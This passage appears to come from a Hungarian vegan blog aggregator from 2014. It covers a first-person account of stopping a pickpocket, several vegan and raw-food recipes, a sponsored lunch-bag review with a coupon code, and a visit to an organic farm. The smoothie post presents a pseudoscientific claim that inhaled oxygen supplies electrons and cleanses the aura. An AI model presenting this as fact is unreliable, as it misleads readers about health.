Ha állatok szenvednek miattunk, és nem mi vagyunk az áldozatok, akkor nagyon könnyű megmagyarázni, hogy miért történik a kizsákmányolás. Nyilván a zsebes is tudna érvelni, hogy mire kell neki a pénz. Azt gondolom, hogy a vegánoknak kötelességük fellépni a kizsákmányolás minden formája ellen, legyen a sértett bármilyen állat, vagy ember. Nem tűrhetjük el, hogy ember és állattestvéreinken élősködjenek, és életükből, munkájukból hasznot húzzanak a kizsákmányolók! Tehát követtem a férfit, aki a csarnok közepén található mozgólépcső felé tartott. Ekkor jutott eszembe, hogy elővegyem a mobilomat, és elkezdjek kamerázni, hátha sikerül bizonyítékot rögzíteni egy zsebes akcióról, és akkor könnyebb elkapni ezt az alakot. Mire elővettem a mobilomat, és feloldottam a képernyőárat, addigra a férfi fellépett a mozgólépcsőre, és azzal a lendülettel felsietett a lépcső közepéig, ahol szorosan egymás mögött ált egy idősebb férfi és hátul egy fiatalabb srác. Ezenkívül az egész lépcsősor üres volt. Az emberünk annak rendje és módja szerint befurakodott a két ember közé, olyan pofátlanul, hogy a hátul álló srácnak még egy lépcsőfokkal lentebb kellett lépnie, mert nem fért el a befurakodó embertől. Persze itt már tudtam, hogy a zsebes tényleg zsebes, és akcióba lépett. Más logikus magyarázat nincs ara, hogy felsiet a lépcsőn, de a közepénél mégis úgy dönt, hogy megáll, ráadásul miközben gyakorlatilag az egész lépcső üres, ő pont az egyedüli olyan helyre tolakodik be, ami foglalt. Úgyhogy én is felszálltam a lépcsőre, és jobbra hajolva próbáltam kilesni, miben mesterkedik, de mivel jobbra dőlt, és a mellette lévő korlátra támaszkodott ő is, ezért csak annyit láttam, hogy az idősebb úrnak, aki mögött állt, a jobb vállán van egy táskának a szíja. Itt már nem néztem a telefonomat, mert nem akartam lekésni a bűntett pillanatát. Fontosabbnak éreztem megakadályozni, mint rögzíteni, hiszen tudtam, hogy ha sikerrel jár, és csak utána próbálom meg elkapni, akkor simán elfuthat, vagy lerázhat a tömegben, és mivel fizikailag is jóval erősebb alkattal rendelkezett, ezért egy esetleges fizikai kontaktusnak sem biztos, hogy számomra, és az ügy számára pozitív kimenetele lenne. Szóval mindez egy pillanat alatt átfutott az agyamon, és már léptem is ki balra, hogy oldalról láthassam, mit is csinál ez a jómadár. Pont jókor néztem oda, mert a keze már indult is az öreg úr táskájának nyitva felejtett zsebe felé, és tekintetét is láthatólag belemélyesztette a nyitott zsebbe. Itt ment fel bennem a pumpa végleg, és léptem fel 1 másodperc alatt vagy 6-7 lépcsőfokot. Mire mellé értem, már csuklóig benne volt a jobb keze a táskában. Elkaptam a zsebes bal kezét, és ráüvöltöttem, hogy "Mit képzelsz magadról, hogy turkálsz mások táskájában? Lopni akarsz ettől az úrtól?" Erre ő felnézett, és miközben a kézfeje még mindig a táskazsebben volt, ezt kérdezte. "Te miről beszélsz?". A kérdés végére kihúzta a kezét, és értetlenül magyarázkodott, hogy én nem vagyok normális, hagyjam békén, meg persze ő nem is csinált ilyet. Közben felért velünk a mozgólépcső, és leléptünk róla. Ekkor mellénk lépett egy másik, kb velem egykorú srác, és elkapta a zsebes bal kezét. Szólt az idős úrnak, hogy ki akarták zsebelni, és hogy ne menjen sehová. Én már hívtam is a 107-et, akik küldtek egy járőrt. Mielőtt a rendőrök megérkeztek volna, a helyi biztonsági őrök is megjelentek, és lekísértek minket az őrszobára, ahol már addigra ott volt a rendőrjárőr. Itt írtak egy rövid esetleírást az elmondásunk alapján, és mindannyiunk (A zsebes, a sértet, és a két szemtanú) adatait lekérték. Külön hallgattak meg minket, hármunkat, és utánna külön a zsebest. Kérték, hogy amíg a zsebessel nem végeznek, ne menjünk el. Ez kb egy órába telt. Gondoltam is, hogy biztos van valami, hogy eddig tart, de megéri, mert egy zsebessel kevesebb lesz egy ideig a városban. Mint ahogy az öreg úrtól megtudtam, 25.000ft készpénz, és vagy 30.000ft-nyi illetéknek megfelelő okirat, bankkártya és hitelkártya volt a tárcájában. Szóval sikerült megmenteni úgy 55.000 forintját, és egy hónap hivatalba mászkálást az iratpótlások kapcsán. Persze azt is tudtam, hogy ha ez az arc gyakorlatilag 30 méteren belül kétszer próbálkozott, akkor valószínűleg még legalább 4-5 sikeres zsebelést megcsinált volna aznap. Ezzel számolva minimum 200.000ft kárt sikerült elhárítani. Tudtam, hogy 72 órára bent tartják, ezért ezt fel lehet szorozni hárommal! Ugyanis a zsebesek minden nap zsebelnek, nem állnak le. Tehát amikor végeztek a rendőrök, akkor félrehívtak minket, és mondták, hogy ne készülődjünk, mert hasonló minősített bűncselekmények miatt már körözték ezt az embert, ezért most el kell mennünk a II. kerületi rendőrkapitányságra tanúvallomást tenni. Nem akarom hosszúra nyújtani. Elmentünk, jegyzőkönyv elkészült. Közben szembesültem azzal, hogy a szomorú magyar valóság a rendőröket is sújtja. Ágy az irodában, mert annyira kevés az ember, és olyan sok a meló, hogy sokszor nincs idő hazamenni aludni sem! Azt is megtudtam, hogy Zsoltit, a zsebest már jól ismerik, hiszen rendszeres vendég náluk, és hogy idén szabadult. Hát nem bírta sokáig. Kb 4 órán keresztül tartott az egész procedúra, az idős hölgy felkiáltásától addig, amíg elhagytam a kapitányságot. Levente, a rendőr srác, aki felvette a jegyzőkönyvet, nagyon közvetlen és rendes volt. Többször megdicsért minket, hogy mertünk cselekedni, és gratulált a "nyomozói vénához". :) Miután elköszöntem Leventétől, a piac felé vettem az irányt, és közben azon gondolkodtam, amit ő mondott. Naponta átlag 5-10 embertől 50-100.000ft-ot zsákmányol egy zsebes, és ezt minden nap, amíg el nem kapják! Ezt megfejelve az okiratok és egyéb dolgok pótlásának költségeivel, amivel a kizsebelteknek számolnia kell, szép kis kárt okoznak. Mivel tudtam, hogy Zsolti most legalább 3 hónapig nem látja a napot, ezért nagyon jó kedvvel töltött el, hogy vegán elveket alkalmazva, sikerült kivonni a forgalomból egy zsebest, és a 3 hónap előzetesbe kerülésével, 4 óra alatt kb 4,5 millió forintot tudtunk megmenteni, és rengeteg embert megkímélni legalább ettől a sorscsapástól. Persze a legjobb az lenne, ha az ilyen embereket tudnánk rehabilitálni, de ehhez ők is kellenének, és egy olyan társadalmi, törvényi háttér, amely jelenleg a kanyarban sincs. A nap további része iszonyatos rohanással telt. Végül még azt is sikerül megvalósítani, amivel már amúgy is kicsit késésben voltam, és az ételkreációm is sikert aratott a vegán összejövetelen, de ez már egy másik történet. J. K. Valentine
Grillezett batáta párolt lilakáposztával és csicseriborsó fasírttal
2014. október 17. Éltető ételek
Szerencsére a gyerekek is szeretik a lilakáposztát, így ez gyakran kerül az asztalra. A batáta viszont nem nagyon kedvenc, így ezt csak hétköznap készítem el, amikor a gyerekek iskolában vannak. Szerencsére már több helyen is lehet batátát vásárolni, már a Lidl-ben is láttam. Én Ásotthalomról vásárolom, kedves kolleganőm szokott rendelni időnként. Hozzávalók: Párolt lilakáposzta: - 1 fej lilakáposzta - himalája só - 1 közepes fej vöröshagyma - 1-2 evőkanál kókuszolaj - pici gyömbér vagy gyömbérpor - 2-3 csipet köménymag - 2-3 evőkanál balzsamecet - 1 alma Grillezett batáta: - 2 közepes batáta - fokhagyma - olívaolaj - himalája só, olaszos fűszerkeverék Fasírt: - 15 dkg áztatott csicseriborsó - 1 kisebb fej vöröshagyma - 2 gerezd fokhagyma - só, bors, pirospaprika - 1 evőkanál darált chiamag Elkészítése: A káposztát gyaluljuk le, majd sózzuk be.A kókuszolajat olvasszuk fel az edényben, majd szórjuk bele a köménymagot. Picit pirítsuk együtt.Adjuk hozzá a vékonyra felszeletelt hagymát, pároljuk meg.Ezután alaposan nyomkodjuk ki a káposztát (mivel elég sok levet ereszt), és adjuk a hagymához.Öntsük rá a balzsamecetet, majd reszeljük bele a gyömbért (vagy szórjuk bele a gyömbérport)Öntsünk rá egy pici vizet, és fedjük le. Kb. fél óráig hagyjuk párolódni lassú tűzön.Reszeljük bele az almát (én nem szoktam meghámozni), és még süssük együtt 10-15 percet. - A batátát hámozzuk meg, majd szeleteljük feé 2-3 mm vastagra. - Sózzuk, reszeljük bele a fokhagymát, és löttyintsük rá az olívaolajat is. - Szórjuk meg a fűszerkeverékkel. - Kevés kókuszolajon süssük meg mindkét oldalát, 5-8 perc alatt elkészül. - A fasírthoz a csicseriborsót be kell áztatni előző éjszaka. - Tegyünk minden alapanyagot a konyhai robotgépbe, és daraboljuk morzsásra. Fűszerezzük. - Adjuk hozzá az őrölt chiamagot, és egy kevés vizet. Hagyjuk, hogy egy picit megduzzadjanak a magok. - Süssük ki kevés kókuszolajon. Hagyjuk kihűlni, szépen összeáll.
Fügés turmix
Lesz megint Zöldturmix Fesztivál, Gitta meghívott így megyek! Már alig várom, ez mindig motiváció, ösztönzőleg hat rám, jó látni, hogy nem csak én gondolkodom, és bontogatom szárnyaimat a nyers étkezés irányába. Akit érdekel a fesztivál íme az elérhetősége: https://www.facebook.com/events/690458051048879/?ref=ts&fref=ts Kertemben jártam, fügebokromon érett fügét találtam. Na persze még az árusoknál is van, érdemes lehetőség szerint a szezonális gyümiket, zöldségeket beiktatni az étkezésbe, na meg a helyit! Felét befaltam, a másik feléből meg fenséges turmixot készítettem. Ez a délelőtti csemegém . A gyümölcsben található cukor az üzemanyaga agyunknak, na meg izmainkat is ez látja el energiával, bizony tervezem is, hogy futok egy jót, vagy, ha beszorulok irány a taposó. Mozogni jó, örömhormon, extra oxigén meg elektron, izzadás, méregtelenítés, anyagcsere turbózás, izmosodás, fogyás, stressz levezetése...csak néhány gondolat ami beugrott róla! Ha megnézed a gyerekeket reggeltől- estig futnak, pörögnek, nem fáradnak el. Olyanok, mint az örökmozgó, talán maga a mozgás generál még több energiát ??? Sokszor én így érzem, és ha a test energiamezejét vizsgáljuk, az aura szépen kitisztul, világosodik, erősödik, ennek fizikai magyarázata, hogy a belélegzett oxigén elektront ad le testünknek, ahogy mozgunk, több oxigénhez így több elektronhoz jutunk = igen nől az energiánk :) Fügés turmix: füge 1-2 banán fahéj kevés beáztatott mazsola
Rozmaringos kápia paprika pástétom
2014. október 6. Zizi kalandjai
Néhányan kértétek a humuszos bejegyzés után, hogy hozzak még recepteket, hogy milyen vega pástétomokat, kencéket lehet a kenyérre kenni, hogy kicsit újítsatok az eddig megszokott repertoárotkon. Na, ez a kápia paprika pástétom ilyen… lehet kenyérre kenni és megpakolni még sok más finomsággal (salátával, sajttal) vagy csak magában pirítósra kenve enni vagy mondjuk egy sajttál mellé tálalni (erről jut eszembe, néhány hete voltunk egy esküvőn, ahol olyan vegán sajttálak voltak felszolgálva, hogy mind a tíz ujjunkat megnyaltuk utána, isteni fűszerezésű és ízű magyar kézműves vegán sajtokból készült!!!), hogy a sajt darabokat vagy kréker darabokat bele lehessen mártogatni. A felhasználási formája elég sokrétű és gyorsan el is készíthető, zárt üvegben a hűtőben pedig eláll két-három hétig. A krém alapját pirított napraforgómag adja, ezt kell ledarálni robotgépben, majd hozzáadni a megsült kápia paprikákat és fűszerezni. A recept a Green Kitchen Stories szakácskönyvből van, minimálisat változtattam rajta (én tettem bele fokhagymát, de ez elhagyható). Rozmaringos kápia paprika pástétom Hozzávalók 1 kisebb üveghez: - 8-10 db kápia paprika - 75 g napraforgómag - 2 ág friss rozmaring levelei - 1 gerezd fokhagyma (opcionális) - 1/2 citrom kifacsart leve - só - csipet cayenne bors (opcionális) A kápia paprikákat tegyük egy sütőpapírral bélelt tepsire és 200C fokon süssük kb. 40 percig, amíg a héjuk kezd megfeketedni. Az így megsült paprikákat tegyük egy tálba, fedjük le folpackkal és hagyjuk kihűlni. Közben hevítsünk fel egy teflon serpenyőt és néhány perc alatt pirítsuk meg a napraforgómagot. Pirítás közben sózzuk és adjuk hozzá a cayenne borsot. Ha a paprikák kihűltek, húzzuk le a megfeketedett héj részüket, ezután vágjuk ki a csumájukat és kaparjuk ki a magokat, vágjuk kisebb darabokra. Tegyük a robotgépbe a pirított napraforgómagot és aprítsuk fel, majd adjuk hozzá a paprika darabokat, a fokhagymát, a citromlevet, a rozmaringot és pürésítsük simára. Kóstoljuk meg és fűszerezzük ízlésünknek megfelelően. Tipp : sült kápia paprikából készíthetünk diós mártogatós krémet vagy szószt főtt tésztához.
Vegán baba uzsonna + SkipHop kedvezménykupon
2014. szeptember 30. Zizi kalandjai
Többen kértétek, hogy adjak tippeket milyen ételeket érdemes vagy jó uzsonnára, snacknek pakolni egy majdnem másfél éves babának. Ádi most már szinte ugyanazokat eszi, amelyeket mi is fogyasztunk. Tízórait ritkábban eszik, mert később szokott reggelizni (nem egy koránkelő baba), azonban a délutáni alvás után mindig van egy- vagy többféle finomság, amit megkóstol. Ez függ attól is, hogy otthon vagyunk vagy éppen úton. Ha otthon vagyunk bármilyen étel szóba jöhet, mert minden a rendelkezésünkre áll: kanál, villa, tányér, asztal, stb. Ha úton vagyunk valahova, akkor érdemes olyat csomagolni, amely könnyen fogyasztható, kézzel/kanállal ehető, nem maszatol túlzottan, ráadásul finom és egészséges is. Néhány tipp, hogy nálunk mi a menő snack: - szezonális gyümölcsök: alma, narancs, banán, szőlő, avokádó - szezonális zöldségek: répa, sült sütőtök - vegán sajt kockákra vágva - natúr kölesgolyó - Alnatura teljeskiörlésű ropi - almás zab palacsinta - banános palacsinta - cukormentes tripla szezámos keksz - natúr puffasztott rizs Az almát szereti egészben is enni, de vághatjuk szeletekre, kockákra, ha még nehezebben rág a baba. A narancsot többnyire megpucolva, gerezdekre szedve csomagolom el. A banánt és szőlőt önállóan eszi Ádi, az avokádót pedig vihetjük félbe vágva, folpackba csomagolva és kanállal eszi meg a húsát a baba. Ádi a répát simán elrágcsálja, a sült sütőtök pedig szintén kanállal ehető. A vegán sajthoz jól passzol a natúr kölesgolyó vagy a ropi (amely egyébként cukormentes is!). Persze mindez az őszi szezonhoz igazodik, ha nyár lenne, nyilván mást pakolnék uzsonnára. Ami az innivalót tekinti, többnyire vizet vagy almalevet viszünk magunkkal. Szeretem vidám, környezetbarát dolgokba csomagolni az uzsonnát. Beszerezés alatt vannak rozsdamentes acél dobozkák, amelyekbe sok minden tehető. Fontosnak tartom, hogy ha műanyag dolgot használok, akkor azok BPA és PVC mentesek legyenek (erről bővebben írtam itt). A Skip*Hop Magyarországtól lehetőséget kaptunk újabb termékek tesztelésére, olyan termékekére, amelyek az uzsonnáztatást teszik színesebbé, vidámabbá. Uzsonnás táskájuk 13 féle színben (állat formában) kapható. A kis ételtároló táska belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, snack vagy ital stb. Belső hálós zsebében evőeszköz, szalvéta is tárolható, ezenkívül beleírhatjuk a gyermekünk nevét. Könnyen tisztítható, nedves ruhával letörölhető, lemosható. Hátizsákként nem használható, csak kézben fogható vagy felakasztható (pl: a babakocsira). A kulacsaik (11 féle színben kapható) BPA-mentesek, ftalát-mentesek, és PVC-mentesek. Minden kulacsban szívószál található, amelyet flip-top kupak véd, így a kulacs nem csöpög. Az üveg és a szívószál is könnyen tisztítható, mosogatógépben mosható. Tartozik hozzá egy extra, pót szívószál is. Ádi nagyon szépen iszik már pohárból, palackból is, de a szívószállal még csak ismerkedik. Tetszik neki, ha buborékot fújok vele a kulacsba vagy a pohárba, tanítom a használatára, de egyelőre még nem a rendeltetésének megfelelően használja. Mindkét termék elnyerte a tetszésünket. Ádi uzsonnáját sokszor a táskámba tettem bele, külön volt minden, a cumisüvegtől kezdve a kis dobozkákig. Az uzsonnás táska maximálisan ki van használva, mindent egy helyre tudok tenni, Ádi pedig imádja hordozgatni, kinyitni, ki- és bepakolni belőle mindent. A kulaccsal pedig egyelőre ismerkedünk, biztos vagyok benne, hogy hamarosan menni fog a szívószállal való ivás. Anya magyaráz, Ádi koncentrál A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie Az uzsonnás táskát és a kulacsot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2014. szeptember 29 és 2014. október 10-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!
“Hagymatokány” – Rizstésztával / Nyers káposzta saláta gazdagon
2014. szeptember 29. Fittanyuka
A nyárnak vége, de néhány erdélyi recept még van a tarsolyomban, amelyeket szinte nemis szükséges reformálni. Az egyik ilyen a hagymából készült főétel, magyaros fűszerekkel, én éppen nem rendhagyó módon rizstésztával párosítottam, amely gluténmentes és könnyen emészthető. Ez az étel bármely évszakban megállja a helyét, íme a recept: Hozzávalók ( 4 fő részére): 1 kg vöröshagyma 2-3 evőkanál kókusz olaj 2 kk himalaya só 1 kk őrölt kömény 1 kk édes, pirospaprika késhegyni őrölt fekete bors 1 ek. zabliszt vagy barna rizsliszt 1-2 cikk préselt fokhagyma 2 dl víz 200 g rizstészta 200 g füstölt tofu A hagymát felaprítjuk és a sóval együtt az olajon ledinszteljük, majd adunk hozzá kevés vizet és puhára pároljuk. Hozzáadjuk a fűszereket, préselt fokhagymát. A zablisztet csomómentesen elkeverjük 1 dl vízben és hozzáaöntjük a hagyma tokányhoz, keverés mellett besűrítjük. Ha szükséges még sózzuk, fűszerezzük. A kockára vágott tofut, kevés sóval és borssal kókuszolajon megpirítjuk, a rizstésztát kifőzzük és a hagymával tálaljuk. Nyers káposzta saláta gazdagon: 1/2 fej zsenge, édes káposzta 1-2 db paradicsom 1 szál répa 1 kk egész kömény 1 kk himalaya só 1/2 citrom leve 2 evk hidegen sajtolt napraforgó olaj A káposztát almareszelőn lereszeljük a répával együtt, a paradicsomot kockára vágjuk, megszórjuk a köménnyel. A citrom levét a hidegen sajtolt olajjal, sóval összerázzuk egy kis üvegben és a salátára öntjük. Az üvegben való összerázás a legegyszerűbb módja a dresszingek elkészítéséhez. Finom, zsenge és ropógós saláta, önmagában vagy főétel mellé.
Egzotikus, trópusi kosárkák: nyers, vegán, minden mentes édesség
2014. szeptember 26. Zöld Avocado
Mostanában kevés édességet kívánunk, de ha készítek valamit, az elég gyakran nyers, természetes alapanyagokból: gyümölcsökből és dió félékből készül, azaz "élő édesség". Magyarországon, és az egész világon is egyre népszerűbbek az élő ételek, a nyers étkek, a Raw food-ok. Egyre több követője van ennek a táplálkozási formának, ami lényegében azt jelenti, hogy minden, amit esznek, az hőkezelés mentes, feldolgozatlan, naturális. Úgy vélik, hogy a gyümölcsök, zölségek, diófélék, csírák, magok stb., azaz a természetes táplálékok 40 Celsius fok felett elveszítik értékes tápértékük nagy részét. Vannak hőérzékeny vitaminok, ásványi anyagok, melyek 40°C fok felett elpusztulnak. Így minden amit ezek a nyers étkezők fogyasztanak, az "élő", és a maximum a 40°C fok alatti aszalás technológiáját alkalmazzák ételeik elkésztése során. Akit érdekel a téma bővebben is, az keressen rá a neten Lénárt Gitta nevére, aki az egyik legnépszerűbb szószólója a nyers étkezők táborának ma Magyarországon. sütésnélküli kókuszos kosárkák Imádom az egzotikus, trópusi gyümölcsöket, és mindent, ami belőlük készül. :-) Ezúttal egy egyszerűen elkészíthető, de kicsit időigényes édességet hoztam nektek. Nem sikerült épp a legszebben, de azért megosztom veletek, mert az íze jó, a külalakon meg még lehet dolgozni. ;-) Viszont annyira finom, és nem lehet abbahagyni az evését, hogy nem akartalak megfosztani titeket az élménytől. A képekben most ne gyönyörködjetek. Inkább készítsétek el ti is, és faljátok a kis mangós, kókuszos, passiógyümölcsös egzotikus kosárkákat. ;-) Akinek pedig szebb külalakban sikerül megörökítenie őket, az küldje el nekem a képeket, én pedig megosztom őket. :-) MANGÓS, KÓKUSZOS, ÉS PASSIÓGYÜMÖLCSÖS KOSÁRKÁK, avagy Mangó mámor és a két egzotikus barátnője HOZZÁVALÓK: kb.36 db kosárkához 200 g darált dió, kesu dió, mandula keveréke (többségben legyen benne a dió)120 g magozott datolya, és aszalt szilva (kb. 75% : 25% arányban, azaz kb.90 g datolya és 30 g szilva. De az arány változhat, attól függően mi van otton. ;-) )2 ek kókuszzsír(2 ek chia mag)2 ek víz1 zöld lime kb. 36 adagnyi, 3 féle töltelékhez: mangós: 1 banán + 1 érett mangó + 1/4 zöld lime (+1 tk útifűmaghéj)kókuszos: 1 banán + 1 dl kókusz tejszín (konzerves) + 2 dl kókusz reszelék + 1/4 zöld limepassiógyümölcsös: 1 banán + 1 dl kókusz tejszín (kenzerves) + 2 db passiógyümölcs + 1/4 zöld lime leve (+1 tk útifűmaghéj) Természetesen a töltelékek/krémek más gyümölcsökkel is elkészülhetnek. Minden, ami kevésbé lédús jöhet. El tudom képzelni pl.: áfonyával vagy meggyel is. egzotikus kosárkák sütés nélkül ELKÉSZÍTÉS: A töltelékekhez a hozzávalókat a turmix gépbe tesszük, és krémet készítünk belőlük. Külön turmixoljuk a mangós, külön a kókuszos, és külön a passiógyümölcsös tölteléket. (A passió gyümölcsösbe ajánlatos a gyümölcsöt nem a turmix géppel belekevereni, hanem utólag kanállal, és akkor nem turmixolja szét a magokat a gép. Gusztusosabb marad.) A 3 külön tálba kiszedett 3 krémet betesszük a hűtőbe. Közben elkészítjük a kosárkákat. A dió, kesu, mandula keveréket porrá őröljük a darálón. A szilvát, datolyát, vizet és zöld lime-ot (hámozás után az egészet) a két késes darálóba tesszük, és lekvárt készítünk belőle. A gép nem fogja szeretni, mert ráragad a késre a lekvár, ezért lassú fokozaton, és szakaszosan, időnként felrázva végezzük a krémesítést. Ha szükséges kevés vizet tehetünk hozzá. A lekvárt és a diós lisztet a chia maggal egyneművé dolgozzuk. Ezt legjobb kézzel végezni. Betesszük a hűtőbe egy fél órára állni a barna tésztát. Miután letelt a fél óra, kivesszük a kosár alapanyagot a hűtőből, és jön a formázás. Több lehetőségünk van. Ha rendelkezünk szilikonos muffin formával a legegyszerűbb, abba nyomkodni kézzel a tésztát, kis kosárkákat formálva. Ha nincs ilyen formánk, akkor elővesszük az alumínium muffin sütőt, meg a muffin papírokat hozzá. Két nagy sütőpapír között laposra nyújtjuk a tésztát. Maximum vastagság, mint egy linzer vastagsága. Tipp: nincs szükségünk sem gyúródeszkára, sem arra, hogy mindent összelisztezzünk, amikor nyújtjuk a tésztát. Tegyük a tésztát két sütőpapír közé, és sem lisztre nem lesz szükségünk, sem a sodrófát nem kell elmosni utána. :-) Egy virág alakú nagy méretű linzer szaggatóval virágokat szaggatunk a tésztából, amiket a muffin papírral bélelt muffin sütőbe ejtünk. Lehetőleg középre ejtsük, hogy a kosárnak a szélei körben meglegyenek, hogy meg tudják majd tartani a tölteléket. Ezt folytatjuk, míg el nem fogy a tészta alapanyag. Ez egy 36 db-os recept, azaz, ha hagyományos muffin sütőnk van, akkor kb.12 db után bajban leszünk, mert megtelik a sütő formánk. Nem gond! ;-) A muffin papírokat egy magasabb falú tálba tesszük, és úgy töltjük meg a tészta kosárkákkal, hogy kicsit összenyomjuk őket, hogy tartsák egymást. Lehet, hogy nem lesznek túl szépek, és szabályosak, mint a sütő formában, de ha finom, kit érdekel, mennyire aszimmetrikus?! ;-) Miután 1-1 tepsi (12 darabos kör) elkészült, érdemes betenni a fagyasztóba őket, hogy a tésztában található kókuszzsír elkezdjen megdermedni, ezáltal tartást adni a kosárkának. Tehát míg az első 12-es kör a fagyiban fázik, addig elkészítjük a következő 12-est. És így tovább... Kb.10 perc fagyasztás után meg lehet tölteni a kosárkákat a hűtőben található töltelékekkel: mangós, kókuszos és passiógyümölcsös. Miután megtöltöttük őket, irány vissza a hűtőbe, és fogyasztásig ott is maradnak! :-) virágok a muffin sütő formábannyers mangó krém muffin tölteléknekMivel ez egy nyers édesség, ezért a hűtés fontos! Ilyenkor tudnak jól összeállni az alkotó elemek: sűrűsödni a krém, dermedni a kosárka. A legjobb, ha csak másnap eszünk belőle, amit persze nehéz kivárni. :-) Ha van otthon aszaló gépünk, akkor a kosárkákat meg is aszalhatjuk, hogy tuti masszívan álljanak, és biztosan finomabb is a ropogós kosarakkal. A jövőben remélhetőleg lesz majd alkalmam ezt is kipróbálni, de ahhoz előbb kell majd egy aszalógép, na meg persze ahhoz kell, egy nagyobb konyha is! ;-) Balázs nem édes szájú, de ezekkel az trópusi ízekkel nagy mosolyt csaltam az arcára, és nem tudta abbahagyni a nassolást. Annak ellenére sem, hogy nem lettek szépek a kosárkák, mert nem voltak elég masszívak. egzotikus, trópusi kosárkák sütés nélkül Megjegyzés: Legközelebb vagy több diót teszek a tésztába, vagy nem kosarakat formázok, hanem kis üveg tálkákba teszem őket, és kanalas desszert lesz belőle. A kókuszos krém a kókusz reszeléktől kemény lett, de a mangós és passiógyümölcsös krém krém szerű maradt, amit nem bánok, mert fincsi krémes, viszont a nem merev falú kosárkák fala dőlésnek indult a krém terhe alatt. :-D Így a legjobb a muffin papírból enni őket. Hát igen. Nem vagyok profi. Még kísérletezgetnem kell. Még ha nem is szép, azért nagyon finom lett, és bűntudat nélkül lehet nassolni, mert sem fehér lisztet, sem cukrot, sem semmilyen mesterséges adalékanyagot nem tartalmaz. Csak amit a természet nekünk adott! ;-) nyers kókusz kosárkák
Fogj kezet a termelővel!
2014. szeptember 18. Zizi kalandjai
Gyönyörű szalanova saláta A Felelős Gasztrohős csapatát volt szerencsém személyesen megismerni egy Makifood Húsmentes Hétfői Vacsora Klub rendezvényen tavaly áprilisban. Aztán idén tavasszal felkértek, hogy a Szimplában a Közös Lábas adománygyűjtési pályázat keretében segítsek nekik 200 főre egy nagy kondér vegetáriánus egytálételt megfőzni. Saci és Judit végtelenül kedves és lelkes csajok és rengeteg önkéntes munkát végeznek, hogy mindenki felismerje: egyszerű döntésekkel könnyen tehetünk a környezetünkért! Tegyünk fedőt a forralandó vízre; annyi vizet töltsünk csak ki, amennyit fel is használunk; ültessünk paradicsomot a balkonunkra (ha van); járjunk piacra; kerüljük a műanyag csomagolást… és válasszunk olyan éttermeket, akik maguk is így tesznek! A Fogj kezet a termelővel! projektjük egy fényképes riportsorozat a Fehérvári úti piacon áruló kistermelőkkel. Céljuk, hogy a magyar kistermelők népszerűsítésével arra buzdítsák olvasóikat, hogy az áruházak helyett kistermelőktől vásároljanak. Elbeszélgetnek a gazdákkal, lekísérik őket a földjeikre és leírják a történetüket, közel hozva az eladót a vásárlóhoz. Céljuk az is, hogy tudatosítsák, hogy az élelmiszer-előállítás milyen fáradtságos művelet, és buzdítsák a magyar lakosságot arra, hogy helyi, szezonális élelmiszereket vásároljanak az import áruk helyett. A projekt a Földművelésügyi Minisztérium Zöld Forrás című pályázatának keretében valósul meg. A témával kapcsolatban eddig megjelent cikkeiket (pl: Miért éri meg kezet fogni a termelővel?, Kofa szociológia, Savanyú igazság a szupermarketekről, stb.) + videót megtekinthetitek itt. A projekt keretén belül mutatom be az egyik kedvenc gazdálkodómat, Nemes Mátyás biogazdát és feleségét Marikát (írtam már róluk korábban a blogon), akik Fülöpjakabon gazdálkodnak. Gazdaságukban egész évben vegetációs, minimális fűtéssel fóliás és hideghajtatással fóliás kertészkedés folyik. Szabadföldön kora tavasztól késő őszig történik termelés. Egy évben 70-80 féle növényt termelnek, elsősorban biopiacra (Budapest, 12. kerület, Csörsz utcai biopiac, minden szombat délelőtt) történő értékesítésre. A helyszínen időpont egyeztetés után lehet vásárolni illetve a kert bármikor megtekinthető (részletek róla itt). Ha jól emlékszem 2006-ban mentem először a Csörsz utcai biopiacra. Fogtam a textil szatyraimat vagy egy kosarat, korán felkeltem és minden szombat reggel a biopiacon tobzódtam. I. nem értette még akkor a lényeget, ő inkább az alvást választotta. Aztán kaptam tőle egy húzós bevásárló kocsit, hogy ne kelljen szegény nekem cipekednem. Majd miután minden alkalommal közöltem vele piac után, hogy én mennyire feltöltődtem és megint milyen szuper volt kint lenni, elkezdett kijárni velem. Megérezte a piac ízét, zamatát és a piac őt is beszippantotta. Aztán megszületett Ádi, és most már hárman járunk minden szombaton a piacra. Ádi is élvezi… imádja, hogy minden zöldséget és gyümölcsöt megkóstolhat nyersen, szeret futkározni a fűben és a ráadás, hogy szuper játszótéren lehet homokozni, hintázni és pelenkázó is van a MOM Művelődési házban. Tökéletes szombat reggeli családi program számunkra. Az évek során kialakult jó barátságunk Mátyásékkal azt eredményezte, hogy ellátogattunk a farmjukra, hogy megnézzük hogyan gazdálkodnak. Ebből láthattok most egy kis fényképes ízelítőt. A szomszéd farm (amelyen Gyöngyösi Sándor gazdálkodik) bárányai Mangalica malackák szintén a szomszédos farmon Gyöngyösi Sándor ganoderma gomba termesztéséről híres Lila színű szalanova saláták (a kedvenceim) Még több saláta… Kedvenc téli zöldségem, a leveleskel Kipróbáltuk a kenyérsütést is Mátyásék vadonatúj kemencéjében Gyönyörű teljeskiörlésű kenyerek, cipók A friss ropogós kenyereket Marika vegetáriánus babgulyással tálalta Az udvar uralkodója Járjatok ti is piacra, beszélgessetek a termelőkkel, gazdálkodókkal, kofákkal! Ha érdekel benneteket, hogyan gazdálkodnak, kérdezzétek meg, hogy elmehetnétek-e a farmjukra. Mindenképpen felüdülő kikapcsolódás egy ilyen látogatás, főleg a városokban élő embernek! Fogjatok kezet velük és köszönjétek meg nekik, hogy kemény munkával élelmiszert termelnek, termesztenek, amelyből ti fantasztikus ételeket készíthettek!
Vegán kókuszos kuglóf csokoládé ganache-sal + Segítsüti 2014. ősz
2014. szeptember 15. Zizi kalandjai
